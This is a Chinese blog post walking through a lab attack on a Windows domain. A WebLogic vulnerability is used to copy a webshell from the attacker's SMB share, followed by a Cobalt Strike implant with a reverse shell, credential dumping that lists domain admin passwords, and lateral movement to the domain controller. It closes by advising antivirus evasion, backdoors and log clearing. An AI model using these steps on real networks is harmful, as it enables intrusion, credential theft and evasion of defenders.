内网域攻击

2024-02-23 03:50
文章标签 攻击 网域

本文主要是介绍内网域攻击,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

什么是域

计算机域是一个有安全边界的计算机集合,在同一个域中的计算机彼此之间已经建立了信任关系,在域内访问其他机器,不再需要被访问机器的许可。 具体参考计算机域_百度百科​​​​​​  。通俗来说就域就像一个家庭,域的大小只不过是家庭人多人少的关系,域控就像这个家庭的家长。内网域攻击的最终目的就是拿到这个家长的权限。

实验拓扑

实验环境

DC

IP:10.10.10.10 OS:Windows 2012(64)

应用:AD 域

WEB

IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64)

应用:Weblogic 10.3.6 MSSQL 2008

PC

IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32)

攻击机

IP:192.168.111.3 OS:Kali

实验思路

.大致思路分析:

1、对目标机器进行信息收集,看相应的端口对应的服务,找服务所对应的版本信息、历史漏洞等

2、利用漏洞上传小马(必要做免杀)

3、用工具来连接小马上传大马

4、再用工具来来接大马

5、大马提权拿到目标机器的最高权限

6、对内网进行扫描,找到域控服务器

7、横向移动对拿到域服务器权限

入手思路:一个域能和外面联系的有WEB服务器,邮箱服务器,这里我们从WEB服务器进去,然后进行横向移动。

信息收集

这里可以查看到web服务器上面运行什么服务,什么端口开放粗略的看一下有什么端口能进行利用,这里因为是靶机就不采用暴力破解方法。

 因为是靶机所以知道afs3-callback存在漏洞,具体可以利用的漏洞可以上传脚本来检测7001端口

发现可以利用CVE-2018-2894这个漏洞。

漏洞分析

发现CVE-2019-2925漏洞

官方地址:cve-website

大致意思:构造一个特殊的http请求能够在目标机上执行命令

copy\\192.168.111.3\share\shell.jsp servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\1.jsp

在我的攻击机上面来进行共享一个含有木马的文件夹,在发送一个http请求,让目标机进行复制到指定的文件目录下

做上传小马准备工具冰蝎

 生成木马文件夹

 启动 smbserver 共享文件服务,将/root/Behinder/server 目录共享出去,共享的名称为 share

开始利用漏洞上传小马

在网上找到相应的模板进行填写,进行攻击。

 

 状态码返回202小马已经传上去了

连接小马并进行第二次信息收集

 小马能够运行无误,这里准备传大马

上传大马并提权

 这里我用的CS这款工具

 生成大马并连接

 通过冰蝎来传输大马同时把提权工具上传

成功拿到系统管理员权限,在域内权限提的是域管理员的权限。

 第三次信息收集

把内存中的登录的账号和密码导出来

导出的东西是加密的要在目标机上解密

 

信息收集的结果

账户               密码

de1ay/WEB   123.abc

de1ay/mssl   1qaz@WSX

Administarator 1qaz@WSX 找到域管理员的明文密码

域控服务器的名称DC

DNS服务器的内网IP 10.10.10.10

这里有了域管理员的账号和密码,就方便多了。我们可以通过下面这个命令找到域控

beacon> shell net group "domain controllers" /domain

通过我们这台机器(system权限)这个凭证来让域控服务器上线。

扫描内网主机

扫描内网主机有多少存活

发现存活给他上线

把整个域环境内的账户和密码导出来,密码是哈希值

实验后思路梳理

1、第一次信息收集,找到突破口信息收集找到相对应的版本信息和对应的版本漏洞(如果不清楚是否修复,全部试一下)

2、第一步找到的漏洞,通过CVE官网找到利用漏洞能做什么,不用登录可执行命令。

3、在攻击机上面创建一个共享文件,里面有对应的马,使用漏洞把马直接复制到web服务器上面,再用冰蝎连接,拿到相对应的用户权限。

4、第二次信息收集

5、通过冰蝎上传一个CS的大马,运行并反弹一个shell 回来(这时的shell权限是普通用户权限)。利用脚本提权工具进行提权。把得到的shell窗口是域管理员的权限。

6、把内存中存在的用户账户密码生成一个加密文件进行输出,把这个文件在目标机上面进行解密,再传递给攻击机,分析日志

7、第三次信息收集

8、把域服务器上线在cs上面利用提权完成的机器上线AD,导出存储的用户名和密码哈希值。

实验反思

  • 在做第一步时如果冒然进行测试漏洞,容易导致目标服务器不能进行正常工作从而容易被发现,可能会被反查。
  • 在传递大小马的时候没有做免杀,容易让目标机安装的一些杀毒软件如360、火绒、以及系统自带的病毒检测软件干掉
  • 在拿到目标权限以后,没有在目标机上生成后门和清除日志,增加了二次进入的难度和提高了被发现的概率

这篇关于内网域攻击的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/737427

相关文章

速盾高防cdn是怎么解决网站攻击的?

速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。 速盾高防CDN主要采用以下几种方式来解决网站攻击: 分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网

Web安全之XSS跨站脚本攻击:如何预防及解决

1. 什么是XSS注入 XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的Web安全漏洞,通过注入恶意代码(通常是JavaScript)到目标网站的网页中,以此在用户浏览网页时执行。攻击者可以通过XSS获取用户的敏感信息(如Cookie、会话令牌)或控制用户浏览器的行为,进而造成信息泄露、身份冒用等严重后果。 2. XSS攻击类型 2.1 存储型XSS 存储型XS

【前端安全】浅谈XSS攻击和防范

定义 XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 分类 大分类小分类原理非存储DOM型① 不需要经过服务器

新型 RAMBO 侧信道攻击通过 RAM 无线电波泄露数据

内盖夫本·古里安大学的研究人员发现了一种从隔离系统中泄露敏感数据的方法。 引入了一种称为 RAMBO(基于 RAM 的电磁隐蔽通道)的新型攻击技术。 该攻击利用计算机 RAM 产生的电磁辐射,使攻击者能够窃取加密密钥、密码、生物特征数据和文件等信息。 即使在系统与外部网络物理隔离的环境中,这种攻击也能实现。 信息泄露速度达 7.5 kB/分钟 该研究由 Morde

DDoS对策是什么?详细解说DDoS攻击难以防御的理由和对策方法

攻击规模逐年增加的DDoS攻击。据相关调查介绍,2023年最大的攻击甚至达到了700Gbps。 为了抑制DDoS攻击的危害,采取适当的对策是很重要的。 特别是在网站显示花费时间或频繁出现504错误的情况下,可能已经受到了DDoS攻击,需要尽早采取对策。 本文将介绍受到DDoS攻击时的事件、受害内容和作为DDoS对策有效的三种服务。 到底什么是DDoS攻击? 理解事件、手段和损害 D

网络安全与恶意攻击:如何应对?

引言 随着技术的发展,我们的生活越来越依赖于网络。但是,这也暴露了我们的系统对各种网络威胁的脆弱性。无论是个人还是企业,网络安全都成为了我们不能忽视的话题。 网络威胁的类型 网络威胁主要有以下几种: 网络钓鱼攻击:这是一种试图通过冒充合法实体来欺骗用户提供敏感信息(例如,密码或信用卡信息)的攻击。 **恶意软件:**恶意软件是设计用来破坏、损坏或者非法获取访问权限的软件。其中包括病

经验笔记:跨站脚本攻击(Cross-Site Scripting,简称XSS)

跨站脚本攻击(Cross-Site Scripting,简称XSS)经验笔记 跨站脚本攻击(XSS:Cross-Site Scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意脚本注入到看起来来自可信网站的网页上。当其他用户浏览该页面时,嵌入的脚本就会被执行,从而可能对用户的数据安全构成威胁。XSS攻击通常发生在Web应用程序未能充分过滤用户提交的数据时,导致恶意脚本得以传递

新型PyPI攻击技术可能导致超2.2万软件包被劫持

一种针对 Python 软件包索引(PyPI)注册表的新型供应链攻击技术已在野外被利用,并且目前正试图渗透到下游组织中。 软件供应链安全公司 JFrog 将其代号定为Revival Hijack,并称这种攻击方法可用于劫持 2.2万个现有 PyPI 软件包,并导致数十万次恶意软件包下载。这些易受攻击的软件包下载量已超过 10 万次,或已活跃超过 6 个月。 JFrog安全研究人员And

redis被攻击redis READONLY You can‘t write against a read only slave.

redis 日志路径 /var/log/redis 拿下来后发现有这种错误 Operation now in progress 可能是网络断开导致, 查找redis whereis redis 修改 vim /etc/redis.conf 大概在300行 下面代码yes改no slave-read-only no 重启redis sudo systemctl restart

预计算攻击(Precomputation Attack):概念与防范

预计算攻击(Precomputation Attack)是一种密码学中的攻击技术,攻击者通过提前计算出可能的密钥或哈希值的映射表,来减少实际攻击时的计算量和时间。预计算攻击广泛应用于针对密码散列函数和对称加密算法的攻击中,常用于破解密码哈希、数字签名等。 1. 预计算攻击的基本概念 预计算攻击的核心思想是通过在攻击前进行大量的计算工作,生成一个可能值到其哈希值(或加密值)的映射表(即“预计算表